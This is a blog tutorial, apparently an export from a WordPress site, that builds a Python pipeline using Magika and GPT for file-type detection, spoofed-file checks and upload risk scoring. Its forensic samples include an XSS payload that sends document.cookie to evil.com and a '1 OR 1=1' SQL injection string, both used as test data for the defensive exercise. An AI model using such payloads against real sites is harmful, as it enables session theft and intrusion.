{"id":761,"date":"2026-04-20T02:38:58","date_gmt":"2026-04-19T18:38:58","guid":{"rendered":"https:\/\/connectword.dpdns.org\/?p=761"},"modified":"2026-04-20T02:38:58","modified_gmt":"2026-04-19T18:38:58","slug":"a-coding-implementation-to-build-an-ai-powered-file-type-detection-and-security-analysis-pipeline-with-magika-and-openai","status":"publish","type":"post","link":"https:\/\/connectword.dpdns.org\/?p=761","title":{"rendered":"A Coding Implementation to Build an AI-Powered File Type Detection and Security Analysis Pipeline with Magika and OpenAI"},"content":{"rendered":"<p>In this tutorial, we build a workflow that combines <a href=\"https:\/\/github.com\/google\/magika\"><strong>Magika\u2019s<\/strong><\/a> deep-learning-based file type detection with OpenAI\u2019s language intelligence to create a practical and insightful analysis pipeline. We begin by setting up the required libraries, securely connecting to the OpenAI API, and initializing Magika to classify files directly from raw bytes rather than relying on filenames or extensions. As we move through the tutorial, we explore batch scanning, confidence modes, spoofed-file detection, forensic-style analysis, upload-pipeline risk scoring, and structured JSON reporting. 
At each stage, we use GPT to translate technical scan outputs into clear explanations, security insights, and executive-level summaries, allowing us to connect low-level byte detection with meaningful real-world interpretation.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-python\">!pip install magika openai -q\n\n\nimport os, io, json, zipfile, textwrap, hashlib, tempfile, getpass\nfrom pathlib import Path\nfrom collections import Counter\nfrom magika import Magika\nfrom magika.types import MagikaResult, PredictionMode\nfrom openai import OpenAI\n\n\nprint(\"\ud83d\udd11 Enter your OpenAI API key (input is hidden):\")\napi_key = getpass.getpass(\"OpenAI API Key: \")\nclient  = OpenAI(api_key=api_key)\n\n\ntry:\n   client.models.list()\n   print(\"\u2705 OpenAI connected successfully\\n\")\nexcept Exception as e:\n   raise SystemExit(f\"\u274c OpenAI connection failed: {e}\")\n\n\nm = Magika()\nprint(\"\u2705 Magika loaded successfully\\n\")\nprint(f\"   module version : {m.get_module_version()}\")\nprint(f\"   model name     : {m.get_model_name()}\")\nprint(f\"   output types   : {len(m.get_output_content_types())} supported labels\\n\")\n\n\ndef ask_gpt(system: str, user: str, model: str = \"gpt-4o\", max_tokens: int = 600) -&gt; str:\n   resp = client.chat.completions.create(\n       model=model,\n       max_tokens=max_tokens,\n       messages=[\n           {\"role\": \"system\", \"content\": system},\n           {\"role\": \"user\",   \"content\": user},\n       ],\n   )\n   return resp.choices[0].message.content.strip()\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 1 \u2014 Core API + GPT Plain-Language Explanation\")\nprint(\"=\" * 60)\n\n\nsamples = {\n   \"Python\":     b'import os\\ndef greet(name):\\n    print(f\"Hello, {name}\")\\n',\n   \"JavaScript\": b'const fetch = require(\"node-fetch\");\\nasync function getData() { return await fetch(\"\/api\"); }',\n   \"CSV\":        b'name,age,city\\nAlice,30,NYC\\nBob,25,LA\\n',\n   \"JSON\":       b'{\"name\": \"Alice\", \"scores\": [10, 20, 30], \"active\": true}',\n   \"Shell\":      b'#!\/bin\/bash\\necho \"Hello\"\\nfor i in $(seq 1 5); do echo $i; done',\n   \"PDF magic\":  b'%PDF-1.4\\n1 0 obj\\n&lt;&lt; \/Type \/Catalog &gt;&gt;\\nendobj\\n',\n   \"ZIP magic\":  bytes([0x50, 0x4B, 0x03, 0x04]) + bytes(26),\n}\n\n\nprint(f\"\\n{'Label':&lt;12} {'MIME Type':&lt;30} {'Score':&gt;6}\")\nprint(\"-\" * 52)\nmagika_labels = []\nfor name, raw in samples.items():\n   res = m.identify_bytes(raw)\n   magika_labels.append(res.output.label)\n   print(f\"{res.output.label:&lt;12} {res.output.mime_type:&lt;30} {res.score:&gt;5.1%}\")\n\n\nexplanation = ask_gpt(\n   system=\"You are a concise ML engineer. Explain in 4\u20135 sentences.\",\n   user=(\n       f\"Magika is Google's AI file-type detector. It just identified these types from raw bytes: \"\n       f\"{magika_labels}. 
Explain how a deep-learning model detects file types from \"\n       \"just bytes, and why this beats relying on file extensions.\"\n   ),\n   max_tokens=250,\n)\nprint(f\"\\n\ud83d\udcac GPT on how Magika works:\\n{textwrap.fill(explanation, 72)}\\n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 2 \u2014 Batch Identification + GPT Summary\")\nprint(\"=\" * 60)\n\n\ntmp_dir = Path(tempfile.mkdtemp())\nfile_specs = {\n   \"code.py\":     b\"import sys\\nprint(sys.version)\\n\",\n   \"style.css\":   b\"body { font-family: Arial; margin: 0; }\\n\",\n   \"data.json\":   b'[{\"id\": 1, \"val\": \"foo\"}, {\"id\": 2, \"val\": \"bar\"}]',\n   \"script.sh\":   b\"#!\/bin\/sh\\necho Hello World\\n\",\n   \"doc.html\":    b\"&lt;html&gt;&lt;body&gt;&lt;p&gt;Hello&lt;\/p&gt;&lt;\/body&gt;&lt;\/html&gt;\",\n   \"config.yaml\": b\"server:\\n  host: localhost\\n  port: 8080\\n\",\n   \"query.sql\":   b\"CREATE TABLE t (id INT PRIMARY KEY, name TEXT);\\n\",\n   \"notes.md\":    b\"# Heading\\n\\n- item one\\n- item two\\n\",\n}\n\n\npaths = []\nfor fname, content in file_specs.items():\n   p = tmp_dir \/ fname\n   p.write_bytes(content)\n   paths.append(p)\n\n\nresults       = m.identify_paths(paths)\nbatch_summary = [\n   {\"file\": p.name, \"label\": r.output.label,\n    \"group\": r.output.group, \"score\": f\"{r.score:.1%}\"}\n   for p, r in zip(paths, results)\n]\n\n\nprint(f\"\\n{'File':&lt;18} {'Label':&lt;14} {'Group':&lt;12} {'Score':&gt;6}\")\nprint(\"-\" * 54)\nfor row in batch_summary:\n   print(f\"{row['file']:&lt;18} {row['label']:&lt;14} {row['group']:&lt;12} {row['score']:&gt;6}\")\n\n\ngpt_summary = ask_gpt(\n   system=\"You are a DevSecOps expert. Be concise and practical.\",\n   user=(\n       f\"A file upload scanner detected these file types in a batch: \"\n       f\"{json.dumps(batch_summary)}. \"\n       \"In 3\u20134 sentences, summarise what kind of project this looks like \"\n       \"and flag any file types that might warrant extra scrutiny.\"\n   ),\n   max_tokens=220,\n)\nprint(f\"\\n\ud83d\udcac GPT project analysis:\\n{textwrap.fill(gpt_summary, 72)}\\n\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We install the required libraries, connect Magika and OpenAI, and set up the core helper function that lets us send prompts for analysis. We begin by testing Magika on various raw byte samples to see how it identifies file types without relying on file extensions. We also create a batch of sample files and use GPT to summarize what kind of project or codebase the detected file collection appears to represent.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-python\">print(\"=\" * 60)\nprint(\"SECTION 3 \u2014 Prediction Modes + GPT Mode-Selection Guidance\")\nprint(\"=\" * 60)\n\n\nambiguous    = b\"Hello, world. This is a short text.\"\nmode_results = {}\n\n\nfor mode in [PredictionMode.HIGH_CONFIDENCE,\n            PredictionMode.MEDIUM_CONFIDENCE,\n            PredictionMode.BEST_GUESS]:\n   m_mode = Magika(prediction_mode=mode)\n   res    = m_mode.identify_bytes(ambiguous)\n   mode_results[mode.name] = {\n       \"label\": res.output.label,\n       \"score\": f\"{res.score:.1%}\",\n   }\n   print(f\"  {mode.name:&lt;22}  label={res.output.label:&lt;20} score={res.score:.1%}\")\n\n\nguidance = ask_gpt(\n   system=\"You are a security engineer. Be concise (3 bullet points).\",\n   user=(\n       f\"Magika's three confidence modes returned: {json.dumps(mode_results)} \"\n       \"for the same ambiguous text snippet. Give one practical use-case where each mode \"\n       \"(HIGH_CONFIDENCE, MEDIUM_CONFIDENCE, BEST_GUESS) is the right choice.\"\n   ),\n   max_tokens=220,\n)\nprint(f\"\\n\ud83d\udcac GPT on when to use each mode:\\n{guidance}\\n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 4 \u2014 MagikaResult Anatomy + GPT Field Explanation\")\nprint(\"=\" * 60)\n\n\ncode_snippet = b\"\"\"\n#!\/usr\/bin\/env python3\nfrom typing import List\n\n\ndef fibonacci(n: int) -&gt; List[int]:\n   a, b = 0, 1\n   result = []\n   for _ in range(n):\n       result.append(a)\n       a, b = b, a + b\n   return result\n\"\"\"\n\n\nres = m.identify_bytes(code_snippet)\nresult_dict = {\n   \"output.label\":       res.output.label,\n   \"output.description\": res.output.description,\n   \"output.mime_type\":   res.output.mime_type,\n   \"output.group\":       res.output.group,\n   \"output.extensions\":  res.output.extensions,\n   \"output.is_text\":     res.output.is_text,\n   \"dl.label\":           res.dl.label,\n   \"dl.description\":     res.dl.description,\n   \"dl.mime_type\":       res.dl.mime_type,\n   \"score\":              round(res.score, 4),\n}\nfor k, v in 
result_dict.items():\n   print(f\"  {k:&lt;28} = {v}\")\n\n\nfield_explanation = ask_gpt(\n   system=\"You are a concise ML engineer.\",\n   user=(\n       f\"Magika returned this result object for a Python file: {json.dumps(result_dict)}. \"\n       \"In 4 sentences, explain the difference between the `dl.*` fields and `output.*` fields, \"\n       \"and why dl.label and output.label might differ even though there is only one score.\"\n   ),\n   max_tokens=220,\n)\nprint(f\"\\n\ud83d\udcac GPT explains dl vs output:\\n{textwrap.fill(field_explanation, 72)}\\n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 5 \u2014 Spoofed Files + GPT Threat Assessment\")\nprint(\"=\" * 60)\n\n\nspoofed_files = {\n   \"invoice.pdf\":  b'#!\/usr\/bin\/env python3\\nprint(\"I am Python, not a PDF!\")\\n',\n   \"photo.jpg\":    b'&lt;html&gt;&lt;body&gt;This is HTML masquerading as JPEG&lt;\/body&gt;&lt;\/html&gt;',\n   \"data.csv\":     bytes([0x50, 0x4B, 0x03, 0x04]) + bytes(26),\n   \"readme.txt\":   b'%PDF-1.4\\n1 0 obj\\n&lt;&lt;\/Type \/Catalog&gt;&gt;\\nendobj\\n',\n   \"legit.py\":     b'import sys\\nprint(sys.argv)\\n',\n}\next_to_expected = {\"pdf\": \"pdf\", \"jpg\": \"jpeg\", \"csv\": \"zip\", \"txt\": \"pdf\", \"py\": \"python\"}\n\n\nthreats = []\nprint(f\"\\n{'Filename':&lt;18} {'Expected':^10} {'Detected':^14} {'Match':^6}  {'Score':&gt;6}\")\nprint(\"-\" * 62)\nfor fname, content in spoofed_files.items():\n   ext      = fname.rsplit(\".\", 1)[-1]\n   expected = ext_to_expected.get(ext, ext)\n   res      = m.identify_bytes(content)\n   detected = res.output.label\n   match    = \"\u2705\" if detected == expected else \"\ud83d\udea8\"\n   if detected != expected:\n       threats.append({\"file\": fname, \"claimed_ext\": ext, \"actual_type\": detected})\n   print(f\"{fname:&lt;18} {expected:^10} {detected:^14} {match:^6}  {res.score:&gt;5.1%}\")\n\n\nthreat_report = ask_gpt(\n   system=\"You are a SOC analyst. Be specific and concise.\",\n   user=(\n       f\"Magika detected these extension-spoofed files: {json.dumps(threats)}. \"\n       \"For each mismatch, describe in one sentence what the likely threat vector is \"\n       \"and what action a security team should take.\"\n   ),\n   max_tokens=300,\n)\nprint(f\"\\n\ud83d\udcac GPT threat assessment:\\n{threat_report}\\n\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We explore Magika\u2019s prediction modes and compare how different confidence settings behave when the input is ambiguous. We then inspect the structure of the Magika result object in detail to understand the distinction between processed output fields and raw model fields. 
After that, we test spoofed files with misleading extensions and use GPT to explain the likely threat vectors and recommended security responses.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-python\">print(\"=\" * 60)\nprint(\"SECTION 6 \u2014 Corpus Distribution + GPT Insight\")\nprint(\"=\" * 60)\n\n\ncorpus = [\n   b\"SELECT * FROM orders WHERE status='open';\",\n   b\"&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;body&gt;page&lt;\/body&gt;&lt;\/html&gt;\",\n   b\"import numpy as np\\nprint(np.zeros(10))\",\n   b\"body { color: red; }\",\n   b'{\"key\": \"value\"}',\n   b\"name,score\\nAlice,95\\nBob,87\",\n   b\"# Title\\n## Section\\n- bullet\",\n   b\"echo hello\\nls -la\",\n   b\"const x = () =&gt; 42;\",\n   b'package main\\nimport \"fmt\"\\nfunc main() { fmt.Println(\"Go\") }',\n   b\"public class Hello { public static void main(String[] a) {} }\",\n   b'fn main() { println!(\"Rust!\"); }',\n   b\"#!\/usr\/bin\/env ruby\\nputs 'hello'\",\n   b\"&lt;?php echo 'Hello World'; ?&gt;\",\n   b\"[section]\\nkey=value\\nanother=thing\",\n   b\"FROM python:3.11\\nCOPY . \/app\\nCMD python app.py\",\n   b\"apiVersion: v1\\nkind: Pod\\nmetadata:\\n  name: test\",\n]\n\n\nall_results  = [m.identify_bytes(b) for b in corpus]\ngroup_counts = Counter(r.output.group for r in all_results)\nlabel_counts = Counter(r.output.label for r in all_results)\n\n\nprint(\"\\nBy GROUP:\")\nfor grp, cnt in sorted(group_counts.items(), key=lambda x: -x[1]):\n   print(f\"  {grp:&lt;12} {'\u2588' * cnt} ({cnt})\")\n\n\nprint(\"\\nBy LABEL:\")\nfor lbl, cnt in sorted(label_counts.items(), key=lambda x: -x[1]):\n   print(f\"  {lbl:&lt;18} {cnt}\")\n\n\ndistribution = {\"groups\": dict(group_counts), \"labels\": dict(label_counts)}\ninsight = ask_gpt(\n   system=\"You are a staff engineer reviewing a code repository. Be concise.\",\n   user=(\n       f\"A file scanner found this type distribution: {json.dumps(distribution)}. \"\n       \"In 3\u20134 sentences, describe what kind of repository this is, \"\n       \"and suggest one thing to watch out for from a maintainability perspective.\"\n   ),\n   max_tokens=220,\n)\nprint(f\"\\n\ud83d\udcac GPT repository insight:\\n{textwrap.fill(insight, 72)}\\n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 7 \u2014 Minimum Bytes Needed + GPT Explanation\")\nprint(\"=\" * 60)\n\n\nfull_python = b\"#!\/usr\/bin\/env python3\\nimport os, sys\\nprint('hello')\\n\" * 10\nprobe_data  = {}\nprint(f\"\\nFull content size: {len(full_python)} bytes\")\nprint(f\"\\n{'Prefix (bytes)':&lt;18} {'Label':&lt;14} {'Score':&gt;6}\")\nprint(\"-\" * 40)\nfor size in [4, 8, 16, 32, 64, 128, 256, 512]:\n   res = m.identify_bytes(full_python[:size])\n   probe_data[str(size)] = {\"label\": res.output.label, \"score\": round(res.score, 3)}\n   print(f\"  first {size:&lt;10}  {res.output.label:&lt;14} {res.score:&gt;5.1%}\")\n\n\nprobe_insight = ask_gpt(\n   system=\"You are a concise ML engineer.\",\n   user=(\n       f\"Magika's identification of a Python file at different byte-prefix lengths: \"\n       f\"{json.dumps(probe_data)}. \"\n       \"In 3 sentences, explain why a model can identify file types from so few bytes, \"\n       \"and what architectural choices make this possible.\"\n   ),\n   max_tokens=200,\n)\nprint(f\"\\n\ud83d\udcac GPT on byte-level detection:\\n{textwrap.fill(probe_insight, 72)}\\n\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We analyze a mixed corpus of code and configuration content to understand the distribution of detected file groups and labels across a repository-like dataset. We use these results to let GPT infer the repository\u2019s nature and highlight maintainability concerns based on the detected composition. We also probe how many bytes Magika needs for identification and examine how early byte-level patterns can still reveal file identity with useful confidence.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-python\">print(\"=\" * 60)\nprint(\"SECTION 8 \u2014 Upload Scanner Pipeline + GPT Risk Scoring\")\nprint(\"=\" * 60)\n\n\nupload_dir = Path(tempfile.mkdtemp()) \/ \"uploads\"\nupload_dir.mkdir()\nuploads = {\n   \"report.pdf\":      b'%PDF-1.4\\n1 0 obj\\n&lt;&lt;\/Type \/Catalog&gt;&gt;\\nendobj\\n',\n   \"data_export.csv\": 
b\"id,name,emailn1,Alice,a@x.comn2,Bob,b@x.comn\",\n   \"setup.sh\":        b\"#!\/bin\/bashnapt-get update &amp;&amp; apt-get install -y curln\",\n   \"config.json\":     b'{\"debug\": true, \"workers\": 4}',\n   \"malware.exe\":     bytes([0x4D, 0x5A]) + bytes(100),\n   \"index.html\":      b\"&lt;html&gt;&lt;body&gt;Hello&lt;\/body&gt;&lt;\/html&gt;\",\n   \"main.py\":         b\"from flask import Flasknapp = Flask(__name__)n\",\n   \"suspicious.txt\":  bytes([0x4D, 0x5A]) + bytes(50),\n}\n\n\nfor fname, content in uploads.items():\n   (upload_dir \/ fname).write_bytes(content)\n\n\nall_paths     = list(upload_dir.iterdir())\nbatch_results = m.identify_paths(all_paths)\n\n\nBLOCKED_LABELS = {\"pe\", \"elf\", \"macho\"}\next_map        = {\"pdf\": \"pdf\", \"csv\": \"csv\", \"sh\": \"shell\", \"json\": \"json\",\n                 \"exe\": \"pe\", \"html\": \"html\", \"py\": \"python\", \"txt\": \"txt\"}\n\n\nscan_results = []\nprint(f\"n{'File':&lt;22} {'Label':&lt;16} {'Score':&gt;6}  {'Status'}\")\nprint(\"-\" * 65)\nfor path, res in zip(all_paths, batch_results):\n   o        = res.output\n   ext      = path.suffix.lstrip(\".\")\n   expected = ext_map.get(ext, \"\")\n   mismatch = expected and (o.label != expected)\n\n\n   if o.label in BLOCKED_LABELS:\n       status = \"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f6ab.png\" alt=\"\ud83d\udeab\" class=\"wp-smiley\" \/> BLOCKED\"\n   elif mismatch:\n       status = f\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/26a0.png\" alt=\"\u26a0\" class=\"wp-smiley\" \/>  MISMATCH (ext:{expected})\"\n   else:\n       status = \"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/2705.png\" alt=\"\u2705\" class=\"wp-smiley\" \/> OK\"\n\n\n   scan_results.append({\n       \"file\":   path.name,\n       \"label\":  o.label,\n       \"group\":  o.group,\n       \"score\":  round(res.score, 3),\n       
\"status\": status.replace(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f6ab.png\" alt=\"\ud83d\udeab\" class=\"wp-smiley\" \/> \", \"\").replace(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/26a0.png\" alt=\"\u26a0\" class=\"wp-smiley\" \/>  \", \"\").replace(\"<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/2705.png\" alt=\"\u2705\" class=\"wp-smiley\" \/> \", \"\"),\n   })\n   print(f\"{path.name:&lt;22} {o.label:&lt;16} {res.score:&gt;5.1%}  {status}\")\n\n\nrisk_report = ask_gpt(\n   system=\"You are a senior security analyst. Be structured and actionable.\",\n   user=(\n       f\"A file upload scanner produced these results: {json.dumps(scan_results)}. \"\n       \"Provide a 5-sentence risk summary: identify the highest-risk files, \"\n       \"explain why they're risky, and give concrete remediation steps.\"\n   ),\n   max_tokens=350,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT risk report:n{risk_report}n\")\n\n\nprint(\"=\" * 60)\nprint(\"SECTION 9 \u2014 Forensics + GPT IOC Narrative\")\nprint(\"=\" * 60)\n\n\nforensic_samples = [\n   (\"sample_A\", b\"import renpattern = re.compile(r'\\d+')n\"),\n   (\"sample_B\", b'{\"attack\": \"sqli\", \"payload\": \"1 OR 1=1\"}'),\n   (\"sample_C\", bytes([0xFF, 0xD8, 0xFF, 0xE0]) + b\"JFIF\" + bytes(50)),\n   (\"sample_D\", b\"&lt;script&gt;document.location='http:\/\/evil.com?c='+document.cookie&lt;\/script&gt;\"),\n   (\"sample_E\", b\"MZ\" + bytes(100)),\n]\n\n\nioc_data = []\nprint(f\"n{'Name':&lt;12} {'SHA256':18} {'Label':&lt;14} {'MIME':&lt;28} {'is_text'}\")\nprint(\"-\" * 80)\nfor name, content in forensic_samples:\n   sha = hashlib.sha256(content).hexdigest()[:16]\n   res = m.identify_bytes(content)\n   o   = res.output\n   ioc_data.append({\n       \"id\":            
name,\n       \"sha256_prefix\": sha,\n       \"label\":         o.label,\n       \"mime\":          o.mime_type,\n       \"is_text\":       o.is_text,\n   })\n   print(f\"{name:&lt;12} {sha:&lt;18} {o.label:&lt;14} {o.mime_type:&lt;28} {o.is_text}\")\n\n\nioc_narrative = ask_gpt(\n   system=\"You are a threat intelligence analyst writing an incident report.\",\n   user=(\n       f\"During a forensic investigation, these file samples were recovered: \"\n       f\"{json.dumps(ioc_data)}. \"\n       \"Write a concise 5-sentence Indicators of Compromise (IOC) narrative \"\n       \"describing the likely attack chain and what each sample represents.\"\n   ),\n   max_tokens=350,\n)\nprint(f\"n<img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/17.0.2\/72x72\/1f4ac.png\" alt=\"\ud83d\udcac\" class=\"wp-smiley\" \/> GPT IOC narrative:n{ioc_narrative}n\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We simulate a real upload-scanning pipeline that classifies files, compares detected types against expected extensions, and decides whether each file should be allowed, flagged, or blocked. We then move into a forensic scenario in which we generate SHA-256 prefixes, inspect MIME types, and create structured indicators from recovered file samples. 
Throughout both parts, we use GPT to convert technical scan results into practical risk summaries and concise IOC-style incident narratives.<\/p>\n<div class=\"dm-code-snippet dark dm-normal-version default no-background-mobile\">\n<div class=\"control-language\">\n<div class=\"dm-buttons\">\n<div class=\"dm-buttons-left\">\n<div class=\"dm-button-snippet red-button\"><\/div>\n<div class=\"dm-button-snippet orange-button\"><\/div>\n<div class=\"dm-button-snippet green-button\"><\/div>\n<\/div>\n<div class=\"dm-buttons-right\"><a><span class=\"dm-copy-text\">Copy Code<\/span><span class=\"dm-copy-confirmed\">Copied<\/span><span class=\"dm-error-message\">Use a different Browser<\/span><\/a><\/div>\n<\/div>\n<pre class=\" no-line-numbers\"><code class=\" no-wrap language-python\">print(\"=\" * 60)\nprint(\"SECTION 10 \u2014 JSON Report + GPT Executive Summary\")\nprint(\"=\" * 60)\n\n\nexport_samples = {\n   \"api.py\":      b\"from fastapi import FastAPI\\napp = FastAPI()\\n@app.get('\/')\\ndef root(): return {}\\n\",\n   \"schema.sql\":  b\"CREATE TABLE users (id SERIAL PRIMARY KEY, email TEXT UNIQUE);\\n\",\n   \"deploy.yaml\": b\"name: deploy\\non: push\\njobs:\\n  build:\\n    runs-on: ubuntu-latest\\n\",\n   \"evil.exe\":    bytes([0x4D, 0x5A]) + bytes(100),\n   \"spoof.pdf\":   b'#!\/usr\/bin\/env python3\\nprint(\"not a pdf\")\\n',\n}\n\n\nreport = []\nfor name, content in export_samples.items():\n   res = m.identify_bytes(content)\n   o   = res.output\n   report.append({\n       \"filename\":    name,\n       \"label\":       o.label,\n       \"description\": o.description,\n       \"mime_type\":   o.mime_type,\n       \"group\":       o.group,\n       \"is_text\":     o.is_text,\n       \"dl_label\":    res.dl.label,\n       \"score\":       round(res.score, 4),\n   })\n\n\nprint(json.dumps(report, indent=2))\n\n\nexec_summary = ask_gpt(\n   system=\"You are a CISO writing a two-paragraph executive summary. Be clear and non-technical.\",\n   user=(\n       f\"An AI file scanner analysed these files: {json.dumps(report)}. \"\n       \"Write a two-paragraph executive summary: paragraph 1 covers what was found \"\n       \"and the overall risk posture; paragraph 2 gives recommended next steps.\"\n   ),\n   max_tokens=400,\n)\nprint(f\"\\n\ud83d\udcac GPT executive summary:\\n{exec_summary}\\n\")\n\n\nout_path = \"\/tmp\/magika_openai_report.json\"\nwith open(out_path, \"w\") as f:\n   json.dump({\"scan_results\": report, \"executive_summary\": exec_summary}, f, indent=2)\nprint(f\"\ud83d\udcbe Full report saved to: {out_path}\")\n\n\nprint(\"\\n\" + \"=\" * 60)\nprint(\"\u2705 Magika + OpenAI Tutorial Complete!\")\nprint(\"=\" * 60)\nprint(\"\"\"\nAll fixes applied (magika 1.0.2):\n \u2717 from magika import MagikaConfig    \u2192 removed (never existed)\n \u2717 MagikaConfig(prediction_mode=m)   \u2192 Magika(prediction_mode=m)\n \u2717 m.get_model_version()             \u2192 m.get_model_name()\n \u2717 res.output_score                  \u2192 res.score\n \u2717 res.dl_score \/ res.dl.score       \u2192 res.score  (score only lives on MagikaResult)\n\n\nMagikaResult field map (1.0.2):\n res.score           \u2190 the one and only confidence score\n res.output.label    \u2190 final label after threshold logic   (use this)\n res.dl.label        \u2190 raw model label before thresholding (for debugging)\n res.output.*        \u2190 description, mime_type, group, extensions, is_text\n res.dl.*            \u2190 same fields but from the raw model output\n\n\nSections:\n \u00a71   Core API (bytes\/path\/stream)         + GPT explains Magika's ML approach\n \u00a72   Batch scanning                       + GPT project-type analysis\n \u00a73   Confidence modes via constructor arg + GPT when-to-use guidance\n \u00a74   MagikaResult anatomy                 + GPT explains dl vs output fields\n \u00a75   Spoofed-file detection               + GPT threat assessment per mismatch\n \u00a76   Corpus distribution                  + GPT repository insight\n \u00a77   Byte-prefix probing                  + GPT explains byte-level detection\n \u00a78   Upload pipeline (allow\/block\/flag)   + GPT risk report\n \u00a79   Forensics hash+type fingerprinting   + GPT IOC narrative\n\u00a710   JSON report export                   + GPT CISO executive summary\n\"\"\")<\/code><\/pre>\n<\/div>\n<\/div>\n<p>We build a structured JSON report from multiple analyzed files and capture key metadata, including labels, MIME types, text status, and model confidence scores. We then use GPT to produce a non-technical executive summary that explains the overall findings, risk posture, and recommended next steps in a way that leadership can understand. Finally, we export the results to a JSON file and print a completion summary that reinforces the Magika 1.0.2 fixes and the full scope of the tutorial.<\/p>\n<p>In conclusion, we saw how Magika and OpenAI work together to form a powerful AI-assisted file analysis system that is both technically robust and easy to understand. We use Magika to identify true file types, detect mismatches, inspect suspicious content, and analyze repositories or uploads at scale. At the same time, GPT helps us explain results, assess risks, and generate concise narratives for different audiences. This combination provides a workflow that is useful for developers and researchers, and also for security teams, forensic analysts, and technical decision-makers who need fast, accurate insight from file data. 
Overall, we create a practical end-to-end pipeline that shows how modern AI can improve file inspection, security triage, and automated reporting in a highly accessible Colab environment.<\/p>\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" \/>\n<p>Check out the <strong><a href=\"https:\/\/github.com\/Marktechpost\/AI-Agents-Projects-Tutorials\/blob\/main\/Security\/magika_openai_file_detection_security_analysis_Marktechpost.ipynb\" target=\"_blank\" rel=\"noreferrer noopener\">Full Codes with Notebook here<\/a><\/strong>.<\/p>\n<p>The post <a href=\"https:\/\/www.marktechpost.com\/2026\/04\/19\/a-coding-implementation-to-build-an-ai-powered-file-type-detection-and-security-analysis-pipeline-with-magika-and-openai\/\">A Coding Implementation to Build an AI-Powered File Type Detection and Security Analysis Pipeline with Magika and OpenAI<\/a> appeared first on <a href=\"https:\/\/www.marktechpost.com\/\">MarkTechPost<\/a>.<\/p>","protected":false},"excerpt":{"rendered":"<p>In this tutorial, we build a 